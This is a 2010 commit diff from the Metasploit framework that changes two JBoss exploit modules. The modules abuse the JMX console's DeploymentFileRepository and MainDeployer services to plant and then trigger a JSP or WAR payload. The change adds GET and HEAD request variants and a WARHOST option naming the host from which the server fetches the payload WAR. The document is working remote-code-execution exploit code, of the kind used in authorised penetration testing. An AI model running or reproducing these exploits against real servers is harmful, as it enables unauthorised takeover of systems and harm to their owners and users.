make sure to use correct verbs, thanks mc!

git-svn-id: file:///home/svn/framework3/trunk@9285 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-11 16:20:46 +00:00 · 2010-05-11 16:20:46 +00:00 · 711e08b5e9
parent 4cfc84a2e4
commit 711e08b5e9
2 changed files with 75 additions and 30 deletions
--- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
+++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
@ -67,21 +67,40 @@ class Metasploit3 < Msf::Exploit::Remote

 		fname = rand_text_alpha_upper(rand(5) + 1)

-		res = send_request_cgi(
-			{
-				'uri'	=>  '/jmx-console/HtmlAdaptor',
-				'method' => datastore['VERB'],
-				'data'	=>	'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' +
-					Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
-					Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
-			})
+		data =  'action=invokeOp'
+		data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
+		data << '&methodIndex=5'
+		data << '&arg0=' + Rex::Text.uri_encode(datastore['PATH'])
+		data << '&arg1=' + fname
+		data << '&arg2=.jsp'
+		data << '&arg3=' + Rex::Text.uri_encode(payload.encoded)
+		data << '&arg4=True'
+
+		if (datastore['VERB'] == "POST")
+			res = send_request_cgi(
+				{
+					'uri'    => '/jmx-console/HtmlAdaptor',
+					'method' => datastore['VERB'],
+					'data'   => data
+				})
+		else
+			res = send_request_cgi(
+				{
+					'uri'    =>  '/jmx-console/HtmlAdaptor;index.jsp?' + data,
+					'method' => datastore['VERB'],
+				})
+		end

 		if (res.code == 200)
 			print_status("Triggering payload at '#{datastore['URI']}#{fname}.jsp'...")
+			verb = 'GET'
+			if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
+				verb = 'HEAD'
+			end
 			send_request_raw(
 				{
-					'uri'   => datastore['URI'] + fname + '.jsp',
-					'method' => 'GET',
+					'uri'    => datastore['URI'] + fname + '.jsp',
+					'method' => verb,
 			 	})
 		else
 			print_error("Denied...")
--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@ -71,8 +71,9 @@ class Metasploit3 < Msf::Exploit::Remote
 				Opt::RPORT(8080),
 				OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
 				OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
-				OptString.new('PATH',     [ true,  'The URI path of the console', '/jmx-console']),
-				OptString.new('VERB',     [ true,  'The HTTP verb to use', 'POST']),
+				OptString.new('PATH',     [ true,  'The URI path of the console', '/jmx-console' ]),
+				OptString.new('VERB',     [ true,  'The HTTP verb to use', 'POST' ]),
+				OptString.new('WARHOST',  [ false, 'The host to request the WAR payload from' ]),
 			], self.class)
 	end

@ -149,21 +150,42 @@ class Metasploit3 < Msf::Exploit::Remote
 				'Path' => resource_uri
 			}})

-		print_status("Making the request to the MainDeployer...")
-		res = send_request_cgi({
-			'method'    => datastore['VERB'],
-			'uri'       => datastore['PATH'] + '/HtmlAdaptor',
-			'vars_post' =>
-				{
-					'action'      => 'invokeOp',
-					'name'        => 'jboss.system:service=MainDeployer',
-					# deploy via java.net.URL
-					'methodIndex' => '3', # jboss 4.0.5
-					#'methodIndex' => '21', # jboss 3.0.8
-					#'methodIndex' => '23', # jboss 3.2.7
-					'arg0'        => service_url
-				}
-		}, 20)
+		if (datastore['WARHOST'])
+			service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'] + resource_uri
+		end
+		#method_index = jboss_detect_method_index
+		print_status("Asking the JBoss server to deploy (via MainDeployer) #{service_url}")
+		if (datastore['VERB'] == "POST")
+			res = send_request_cgi({
+					'method'    => datastore['VERB'],
+					'uri'       => datastore['PATH'] + '/HtmlAdaptor',
+					'vars_post' =>
+						{
+							'action'      => 'invokeOp',
+							'name'        => 'jboss.system:service=MainDeployer',
+							# deploy via java.net.URL
+							'methodIndex' => '3', # jboss 4.0.5
+							#'methodIndex' => '21', # jboss 3.0.8
+							#'methodIndex' => '23', # jboss 3.2.7
+							'arg0'        => service_url
+						}
+				})
+		else
+			res = send_request_cgi({
+					'method'    => datastore['VERB'],
+					'uri'       => datastore['PATH'] + '/HtmlAdaptor',
+					'vars_get' =>
+						{
+							'action'      => 'invokeOp',
+							'name'        => 'jboss.system:service=MainDeployer',
+							# deploy via java.net.URL
+							'methodIndex' => '3', # jboss 4.0.5
+							#'methodIndex' => '21', # jboss 3.0.8
+							#'methodIndex' => '23', # jboss 3.2.7
+							'arg0'        => service_url
+						}
+				})
+		end
 		if (! res)
 			raise RuntimeError, "Unable to deploy WAR archive [No Response]"
 		end
@ -194,10 +216,14 @@ class Metasploit3 < Msf::Exploit::Remote
 		# EXECUTE
 		#
 		print_status("Executing #{app_base}...")
+		verb = 'GET'
+		if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
+			verb = 'HEAD'
+		end
 		res = send_request_cgi({
-			'uri'     => '/' + app_base + '/' + jsp_name + '.jsp',
-			'method'  => 'GET'
-		}, 20)
+				'uri'     => '/' + app_base + '/' + jsp_name + '.jsp',
+				'method'  => verb
+			}, 20)

 		if (! res)
 			print_error("Execution failed on #{app_base} [No Response]")